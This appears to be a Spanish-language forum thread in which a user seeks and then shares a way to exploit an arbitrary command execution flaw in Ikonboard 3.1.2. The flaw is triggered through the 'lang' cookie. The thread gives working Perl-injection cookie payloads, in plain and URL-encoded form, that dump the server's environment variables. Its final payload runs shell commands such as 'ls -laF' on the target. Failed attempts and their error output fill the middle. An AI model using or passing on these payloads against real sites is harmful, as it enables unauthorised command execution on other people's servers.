Hola:
Hay un exploit para ikonboard 3.1.2 el cual se hace mediante la cookie:

http://archive.cert.uni-stuttgart.de/archive/bugtraq/2003/09/msg00256.html
arbitrary command execution vulnerability

aqui envio una cookie con valor:
.%00"if print("Content-type: text/plain ",map"$_ => $ENV{$_} ",keys%ENV)&&exit;#
pero en forma de url encode como dice el texto:

%2E%00%22if%20print%28%22Content%2Dtype%3A%20text%2Fplain%0D%0A%0D%0A%22%2Cmap%22%24_%20%3D%3E%20%24ENV%7B%24_%7D%0A%22%2Ckeys%25ENV%29%26%26exit%3B%23

esto me funciona , el sitio me devuelve las variables enviroment .
Ahora, quiero enviar commandos como pwd o ls pero no encuentro la forma.

he tratado añadiendo comandos obteniendo diversos errores:
.%00"if print("Content-type: text/plain ",map"$_ => $ENV{$_} ",keys%ENV)&&pwd;#
.%00"if print("Content-type: text/plain ",map"$_ => $ENV{$_} ",keys%ENV)&&exit;echo;pwd;#

me da error:
Could not access the language file: Bareword "pwd" not allowed while "strict subs" in use

.%00"echo;pwd;#
Could not access the language file: syntax error
This error was reported at: (eval 8) line 1, near ""." Bareword "pwd" not allowed while "strict subs" in use

.%00echo;pwd;#
. did not return a true value

Ya pase horas tratando de hacerlo.
Agradeceria mucho si alguien que ha usado este exploit me echara una mano en eso.

gracias sdc, despues de dias intentando ya encontre como enviar comandos.
Ejmplo ls -laF

esta cookie nos dara el listado de directorios:
lang=.%00"if print("Content-type: text/plain ",`ls -laF`)&&exit;#